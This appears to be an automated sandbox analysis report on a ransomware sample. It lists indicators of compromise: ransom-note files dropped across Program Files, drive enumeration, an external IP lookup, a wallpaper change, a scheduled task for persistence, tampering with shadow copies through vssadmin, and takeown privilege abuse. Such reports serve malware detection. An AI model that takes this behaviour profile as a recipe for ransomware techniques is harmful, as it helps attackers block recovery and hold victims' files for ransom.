C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\QY1C4128\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\6ZEZX6DE\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Links\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\G5DX35ZA\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\V: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\O: D22bUU4y64.exe File opened (read-only) \??\X: D22bUU4y64.exe File opened (read-only) \??\Z: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\W: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\M: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\G: D22bUU4y64.exe File opened (read-only) \??\K: D22bUU4y64.exe File opened (read-only) \??\S: D22bUU4y64.exe File opened (read-only) \??\W: D22bUU4y64.exe File opened (read-only) \??\Q: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\N: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\I: D22bUU4y64.exe File opened (read-only) \??\L: D22bUU4y64.exe File opened (read-only) \??\R: D22bUU4y64.exe File opened (read-only) \??\T: D22bUU4y64.exe File opened (read-only) \??\H: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\E: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\A: D22bUU4y64.exe File opened (read-only) \??\H: D22bUU4y64.exe File opened (read-only) \??\J: D22bUU4y64.exe File opened (read-only) \??\Q: D22bUU4y64.exe File opened (read-only) \??\R: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\I: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\V: D22bUU4y64.exe File opened (read-only) \??\Y: D22bUU4y64.exe File opened (read-only) \??\G: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\B: D22bUU4y64.exe File opened (read-only) \??\K: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\N: D22bUU4y64.exe File opened (read-only) \??\P: D22bUU4y64.exe File opened (read-only) \??\S: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\P: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\T: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\M: D22bUU4y64.exe File opened (read-only) \??\X: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\U: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\L: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\J: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\E: D22bUU4y64.exe File opened (read-only) \??\U: D22bUU4y64.exe File opened (read-only) \??\Z: D22bUU4y64.exe File opened (read-only) \??\Y: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened (read-only) \??\O: 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\Mf8QLzo3.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.SF 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-uihandler.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\FreeCell\fr-FR\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Hearts\it-IT\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Regina 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-4 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Mozilla Firefox\install.log 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\security\US_export_policy.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Abidjan 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jawt.lib 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jre7\lib\zi\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Oral 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\management\management.properties 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-7 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Prague 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\id.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Halifax 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port-au-Prince 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Multiplayer\Checkers\es-ES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\stopNetworkServer.bat 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\bin\ssvagent.exe 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Monterrey 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe.sig 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\More Games\it-IT\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_200_percent.pak 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer.bat 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CET 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Luxembourg 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\YST9 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Petersburg 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Chess\it-IT\Chess.exe.mui 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-print.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij.bat 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-5 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Urumqi 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Backgammon\de-DE\bckgRes.dll.mui 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5580 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5756 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 2640 powershell.exe 4084 D22bUU4y64.exe 4084 D22bUU4y64.exe 4084 D22bUU4y64.exe 4084 D22bUU4y64.exe 4084 D22bUU4y64.exe 4084 D22bUU4y64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 4084 D22bUU4y64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2640 powershell.exe Token: SeDebugPrivilege 4084 D22bUU4y64.exe Token: SeLoadDriverPrivilege 4084 D22bUU4y64.exe Token: SeBackupPrivilege 3216 vssvc.exe Token: SeRestorePrivilege 3216 vssvc.exe Token: SeAuditPrivilege 3216 vssvc.exe Token: SeTakeOwnershipPrivilege 3016 takeown.exe Token: SeTakeOwnershipPrivilege 5624 takeown.exe Token: SeTakeOwnershipPrivilege 3852 takeown.exe Token: SeIncreaseQuotaPrivilege 3792 WMIC.exe Token: SeSecurityPrivilege 3792 WMIC.exe Token: SeTakeOwnershipPrivilege 3792 WMIC.exe Token: SeLoadDriverPrivilege 3792 WMIC.exe Token: SeSystemProfilePrivilege 3792 WMIC.exe Token: SeSystemtimePrivilege 3792 WMIC.exe Token: SeProfSingleProcessPrivilege 3792 WMIC.exe Token: SeIncBasePriorityPrivilege 3792 WMIC.exe Token: SeCreatePagefilePrivilege 3792 WMIC.exe Token: SeBackupPrivilege 3792 WMIC.exe Token: SeRestorePrivilege 3792 WMIC.exe Token: SeShutdownPrivilege 3792 WMIC.exe Token: SeDebugPrivilege 3792 WMIC.exe Token: SeSystemEnvironmentPrivilege 3792 WMIC.exe Token: SeRemoteShutdownPrivilege 3792 WMIC.exe Token: SeUndockPrivilege 3792 WMIC.exe Token: SeManageVolumePrivilege 3792 WMIC.exe Token: 33 3792 WMIC.exe Token: 34 3792 WMIC.exe Token: 35 3792 WMIC.exe Token: SeIncreaseQuotaPrivilege 3792 WMIC.exe Token: SeSecurityPrivilege 3792 WMIC.exe Token: SeTakeOwnershipPrivilege 3792 WMIC.exe Token: SeLoadDriverPrivilege 3792 WMIC.exe Token: SeSystemProfilePrivilege 3792 WMIC.exe Token: SeSystemtimePrivilege 3792 WMIC.exe Token: SeProfSingleProcessPrivilege 3792 WMIC.exe Token: SeIncBasePriorityPrivilege 3792 WMIC.exe Token: SeCreatePagefilePrivilege 3792 WMIC.exe Token: SeBackupPrivilege 3792 WMIC.exe Token: SeRestorePrivilege 3792 WMIC.exe Token: SeShutdownPrivilege 3792 WMIC.exe Token: SeDebugPrivilege 3792 WMIC.exe Token: SeSystemEnvironmentPrivilege 3792 WMIC.exe Token: SeRemoteShutdownPrivilege 3792 WMIC.exe Token: SeUndockPrivilege 3792 WMIC.exe Token: SeManageVolumePrivilege 3792 WMIC.exe Token: 33 3792 WMIC.exe Token: 34 3792 WMIC.exe Token: 35 3792 WMIC.exe Token: SeTakeOwnershipPrivilege 5688 takeown.exe Token: SeTakeOwnershipPrivilege 5764 takeown.exe Token: SeTakeOwnershipPrivilege 4772 takeown.exe Token: SeTakeOwnershipPrivilege 4468 takeown.exe Token: SeTakeOwnershipPrivilege 2240 takeown.exe Token: SeTakeOwnershipPrivilege 3980 takeown.exe Token: SeTakeOwnershipPrivilege 1564 takeown.exe Token: SeTakeOwnershipPrivilege 5312 takeown.exe Token: SeTakeOwnershipPrivilege 5464 takeown.exe Token: SeTakeOwnershipPrivilege 2456 takeown.exe Token: SeTakeOwnershipPrivilege 2400 takeown.exe Token: SeTakeOwnershipPrivilege 5676 takeown.exe Token: SeTakeOwnershipPrivilege 3612 takeown.exe Token: SeTakeOwnershipPrivilege 3316 takeown.exe Token: SeTakeOwnershipPrivilege 4104 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2868 wrote to memory of 2936 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 29 PID 2868 wrote to memory of 2936 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 29 PID 2868 wrote to memory of 2936 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 29 PID 2868 wrote to memory of 2936 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 29 PID 2868 wrote to memory of 2732 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 31 PID 2868 wrote to memory of 2732 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 31 PID 2868 wrote to memory of 2732 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 31 PID 2868 wrote to memory of 2732 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 31 PID 2868 wrote to memory of 796 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 33 PID 2868 wrote to memory of 796 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 33 PID 2868 wrote to memory of 796 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 33 PID 2868 wrote to memory of 796 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 33 PID 796 wrote to memory of 2640 796 cmd.exe 35 PID 796 wrote to memory of 2640 796 cmd.exe 35 PID 796 wrote to memory of 2640 796 cmd.exe 35 PID 796 wrote to memory of 2640 796 cmd.exe 35 PID 2868 wrote to memory of 1960 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 36 PID 2868 wrote to memory of 1960 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 36 PID 2868 wrote to memory of 1960 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 36 PID 2868 wrote to memory of 1960 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 36 PID 2868 wrote to memory of 1724 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 37 PID 2868 wrote to memory of 1724 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 37 PID 2868 wrote to memory of 1724 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 37 PID 2868 wrote to memory of 1724 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 37 PID 1960 wrote to memory of 1576 1960 cmd.exe 40 PID 1960 wrote to memory of 1576 1960 cmd.exe 40 PID 1960 wrote to memory of 1576 1960 cmd.exe 40 PID 1960 wrote to memory of 1576 1960 cmd.exe 40 PID 1724 wrote to memory of 828 1724 cmd.exe 41 PID 1724 wrote to memory of 828 1724 cmd.exe 41 PID 1724 wrote to memory of 828 1724 cmd.exe 41 PID 1724 wrote to memory of 828 1724 cmd.exe 41 PID 1960 wrote to memory of 1492 1960 cmd.exe 42 PID 1960 wrote to memory of 1492 1960 cmd.exe 42 PID 1960 wrote to memory of 1492 1960 cmd.exe 42 PID 1960 wrote to memory of 1492 1960 cmd.exe 42 PID 1960 wrote to memory of 1816 1960 cmd.exe 43 PID 1960 wrote to memory of 1816 1960 cmd.exe 43 PID 1960 wrote to memory of 1816 1960 cmd.exe 43 PID 1960 wrote to memory of 1816 1960 cmd.exe 43 PID 2868 wrote to memory of 1568 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 44 PID 2868 wrote to memory of 1568 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 44 PID 2868 wrote to memory of 1568 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 44 PID 2868 wrote to memory of 1568 2868 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 44 PID 1568 wrote to memory of 2776 1568 cmd.exe 46 PID 1568 wrote to memory of 2776 1568 cmd.exe 46 PID 1568 wrote to memory of 2776 1568 cmd.exe 46 PID 1568 wrote to memory of 2776 1568 cmd.exe 46 PID 1568 wrote to memory of 2628 1568 cmd.exe 47 PID 1568 wrote to memory of 2628 1568 cmd.exe 47 PID 1568 wrote to memory of 2628 1568 cmd.exe 47 PID 1568 wrote to memory of 2628 1568 cmd.exe 47 PID 1568 wrote to memory of 3912 1568 cmd.exe 48 PID 1568 wrote to memory of 3912 1568 cmd.exe 48 PID 1568 wrote to memory of 3912 1568 cmd.exe 48 PID 1568 wrote to memory of 3912 1568 cmd.exe 48 PID 3912 wrote to memory of 3936 3912 cmd.exe 50 PID 3912 wrote to memory of 3936 3912 cmd.exe 50 PID 3912 wrote to memory of 3936 3912 cmd.exe 50 PID 3912 wrote to memory of 3936 3912 cmd.exe 50 PID 3936 wrote to memory of 4084 3936 D22bUU4y.exe 51 PID 3936 wrote to memory of 4084 3936 D22bUU4y.exe 51 PID 3936 wrote to memory of 4084 3936 D22bUU4y.exe 51 PID 3936 wrote to memory of 4084 3936 D22bUU4y.exe 51 -
Uses Task Scheduler COM API 1 TTPs
